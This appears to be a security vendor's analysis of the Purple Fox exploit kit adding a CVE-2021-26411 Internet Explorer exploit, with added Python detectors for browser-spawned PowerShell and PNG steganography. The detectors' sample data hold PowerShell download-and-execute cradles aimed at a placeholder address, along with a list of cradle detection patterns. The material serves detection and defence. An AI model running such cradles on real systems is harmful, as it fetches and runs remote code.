Purple Fox is a multi-component malware family that was first documented by Qihoo 360 in September 2018. Originally, it was a trojan that was delivered using the Rig exploit kit (EK). Since then its developers have added new capabilities, including a rootkit component and an exploit kit (also known as Purple Fox EK) to deliver the malware. In mid-2020, Proofpoint suggested that Purple Fox EK may have been developed to replace Rig, plausibly as a cost-saving measure to avoid having to pay another entity to distribute the malware. Exploits against two vulnerabilities, CVE-2020-0674 and CVE-2019-1458, were integrated into Purple Fox at this time. The former exploits a vulnerability in Internet Explorer’s scripting engine to gain code execution, while the latter exploits a vulnerability in win32k.sys to run code with elevated privileges.
In October 2020, SentinelOne described a significant change to Purple Fox’s infection chain and the integration of other privilege escalation exploits. In addition to running several stages of obfuscated PowerShell code to infect systems, Purple Fox’s developers added a feature enabling it to extract other malware stages from image files. Notably, malicious code is hidden inside the images using steganography to avoid detection by web proxies and firewalls.
March 2021 – Purple Fox developers add CVE-2021-26411 exploit
On 12 April 2021, we isolated a Purple Fox EK sample from an HP Sure Click Enterprise customer in the Middle East. Interestingly, the sample attempted to exploit a memory corruption vulnerability in Internet Explorer (CVE-2021-26411) that appeared to be a new addition to Purple Fox’s exploit arsenal. Other Purple Fox EK samples exploiting this vulnerability in the wild were also reported by security researchers.
What is notable about this exploit is that the code run by Purple Fox is very similar to a proof of concept (PoC) published by Enki in mid-March 2021. According to Enki, the exploit was originally used in a social engineering campaign targeting security researchers in January 2021. One possible explanation for the similarity is that the Purple Fox developers simply copied the script from that article. Since the time from PoC to in-the-wild (ITW) sightings was a matter of weeks (Figure 1), organisations only had a small window to patch before risking compromise by Purple Fox.
Figure 1 – Timeline showing the history of CVE-2021-26411. The PoC-to-ITW time is highlighted in orange.
The user encountered Purple Fox EK after searching for the term “نموذج-تمديد-زيارة-” (“Form-extension-visit-” in Arabic) in Google. They clicked on one of the search results to loislandgraf[.]us, which then led to the exploit via several redirects. During the analysis, we noticed that the exploit is not triggered in every case because geofencing was used to control who is targeted. The attacker’s exact strategy in terms of targeted regions remains unclear. The page could not be accessed from countries such as the USA, UK, France, Germany, the Netherlands and Egypt, whereas Italy, Switzerland, Ireland, Sweden and Japan could trigger the infection chain, although this is not an exhaustive list.
Figure 2 – Purple Fox EK web redirections.
Examining the exploit code shows that it is obfuscated in several stages and encrypted using AES. We were able to recover the source code, which shares many similarities with the PoC code released by Enki. The only major difference between the two is that the shellcode in the Purple Fox exploit script is much longer.
Figure 3 – CVE-2021-26411 exploit shellcode.
The shellcode is straightforward to decode. It runs a PowerShell statement that downloads a file from a remote server and then executes the downloaded file, again with PowerShell. The following diagram shows the process flow of the exploit, which HP Sure Click Enterprise isolated inside a disposable micro-virtual machine when the user clicked on the link.
Figure 4 – Process execution flow in HP Sure Controller, showing the exploit that HP Sure Click Enterprise isolated.
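The process chain above (Internet Explorer spawning PowerShell, which downloads a script and runs it with a second PowerShell) is exactly the kind of parent/child and command-line anomaly that endpoint telemetry can catch. The following is an added example, not code from HP or the original post, of detection logic run over constructed Sysmon Event ID 1 style process-creation records. The events, the image paths and the documentation address 198.51.100.10 are all made up for the example; the cradle patterns are generic PowerShell download-and-execute fragments, not Purple Fox signatures.

```python
import base64
import re

# Browsers and PowerShell hosts, compared by lowercase image basename.
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Common PowerShell download-and-execute ("cradle") fragments, matched case-insensitively.
CRADLE_PATTERNS = [
    r"downloadstring", r"downloadfile", r"net\.webclient", r"invoke-webrequest",
    r"\biwr\b", r"invoke-expression", r"\biex\b", r"start-bitstransfer", r"https?://",
]

# Constructed Sysmon Event ID 1 style records (not real Purple Fox telemetry).
# 198.51.100.10 is a documentation address, not a real download server.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/b.ps1')"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.10/a.ps1')\""},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -EncodedCommand "
                    + base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]


def basename(path):
    """Lowercase file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Return the reasons (possibly none) an event looks like a browser-to-PowerShell cradle."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    # Match patterns against the raw command line plus the decoded payload, if any.
    text = cmdline if decoded is None else cmdline + " " + decoded
    reasons = []
    if image in POWERSHELL and parent in BROWSERS:
        reasons.append(f"{parent} spawned {image}")
    if image in POWERSHELL and parent in POWERSHELL:
        reasons.append("powershell spawned powershell")
    if decoded is not None:
        reasons.append("encoded command: " + decoded[:60])
    hits = sorted({p for p in CRADLE_PATTERNS if re.search(p, text, re.I)})
    if hits:
        reasons.append("download cradle: " + ", ".join(hits))
    return reasons


def find_suspicious(events):
    """(index, reasons) for every event with at least one reason."""
    out = []
    for i, ev in enumerate(events):
        reasons = analyse_event(ev)
        if reasons:
            out.append((i, reasons))
    return out


if __name__ == "__main__":
    for i, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {i}: " + "; ".join(reasons))
```

Decoding -EncodedCommand before pattern matching matters: the second stage in the constructed data carries the same cradle as the first, but only the decoded text reveals it. Parent/child pairing and command-line content are scored separately so that a benign scheduled script launched from explorer.exe produces no findings.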
The execution of the malware largely corresponds to the infection chain already described by SentinelOne. The script checks whether the user is an administrator and, if so, installs the malware using an MSI file. If the user is not an administrator, further malware modules are downloaded from the Internet. This is where steganography comes into play.
Figure 5 – Purple Fox EK steganographic images (code removed).
PowerShell scripts are extracted from the downloaded images and executed, leading to privilege escalation through one of the integrated exploits:
- CVE-2021-1732 (Nb. The exploit delivered by Purple Fox EK is similar to this publicly available PoC.)
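The post does not describe how Purple Fox embeds its PowerShell stages in the image files, so the following added example (not HP's or the malware author's code) shows only a generic triage check a responder can run on a downloaded image: it parses the PNG chunk structure, verifies chunk CRCs, and reports data appended after the IEND chunk, non-standard chunk types, and oversized text chunks, all common places to stash a payload. The 1x1 sample image and the hidden script string are constructed in the code, and the address 198.51.100.10 is a documentation address; none of it is Purple Fox material.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types defined in the PNG specification; anything else deserves a look.
KNOWN_CHUNKS = {"IHDR", "PLTE", "IDAT", "IEND", "tRNS", "cHRM", "gAMA", "iCCP", "sBIT",
                "sRGB", "tEXt", "zTXt", "iTXt", "bKGD", "hIST", "pHYs", "sPLT", "tIME"}
TEXT_CHUNKS = {"tEXt", "zTXt", "iTXt"}

# Constructed payload for the example; not taken from a real sample.
HIDDEN_SCRIPT = b"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/stage.ps1')"


def _chunk(ctype, data):
    """Serialise one PNG chunk: big-endian length, type, data, CRC-32 over type+data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_sample_png(trailer=b"", extra_chunks=()):
    """Constructed 1x1 RGB PNG used as test input, optionally with extra chunks or trailing bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width 1, height 1, 8-bit, colour type RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")             # scanline filter byte + one red pixel
    png = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        png += _chunk(ctype, data)
    return png + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailer


def walk_chunks(png):
    """Parse chunks up to IEND. Returns ([(type, length, crc_ok), ...], bytes_after_IEND)."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIGNATURE), []
    while pos + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        crc = png[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc) < 4:
            raise ValueError("truncated chunk")
        crc_ok = struct.unpack(">I", crc)[0] == zlib.crc32(ctype + data)
        chunks.append((ctype.decode("ascii", "replace"), length, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            return chunks, png[pos:]
    raise ValueError("no IEND chunk")


def triage_png(png, text_limit=512):
    """Findings that suggest the image carries data a viewer would never display."""
    chunks, trailer = walk_chunks(png)
    findings = []
    if trailer:
        findings.append(f"{len(trailer)} bytes appended after IEND")
    for ctype, length, crc_ok in chunks:
        if not crc_ok:
            findings.append(f"{ctype} chunk has a bad CRC")
        if ctype not in KNOWN_CHUNKS:
            findings.append(f"non-standard chunk type {ctype!r} ({length} bytes)")
        if ctype in TEXT_CHUNKS and length > text_limit:
            findings.append(f"oversized {ctype} chunk ({length} bytes)")
    return findings


def carve_text(data):
    """Decode carved bytes as text if they look like script, otherwise None."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(ch.isprintable() or ch in "\r\n\t" for ch in text) else None


if __name__ == "__main__":
    suspicious = build_sample_png(trailer=HIDDEN_SCRIPT)
    print(triage_png(suspicious))
    print(carve_text(walk_chunks(suspicious)[1]))
```

Image viewers stop at IEND and ignore chunks they do not understand, which is why appended data and unknown chunks survive transit through proxies that only check the file looks like a valid image. A real extractor for a given family still has to follow that family's encoding (the post notes only that code is hidden steganographically), but this parse gives a quick yes/no on whether an image is worth deeper inspection.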
If the exploit is successful, the MSI and the payload are installed on the client.
Although EK sightings have declined since 2017, the active development of Purple Fox EK suggests this malware delivery method has not gone completely out of fashion. Purple Fox has been around for over two and a half years, during which its developers have regularly extended the EK with new exploits and additional functionality to bypass detection. The addition of a CVE-2021-26411 exploit about a month after the release of the patch does not rule out the possibility that the malware exploited the vulnerability earlier. However, the code similarity between the Enki PoC and the exploit code run by Purple Fox demonstrates how easily and quickly malware developers can adapt public exploit code to their needs. The short time from PoC to real-world sightings once again shows how important it is to patch security vulnerabilities promptly and to monitor for and detect anomalies as they occur.
Indicators of Compromise
Images containing code hidden using steganography:
Privilege escalation exploits: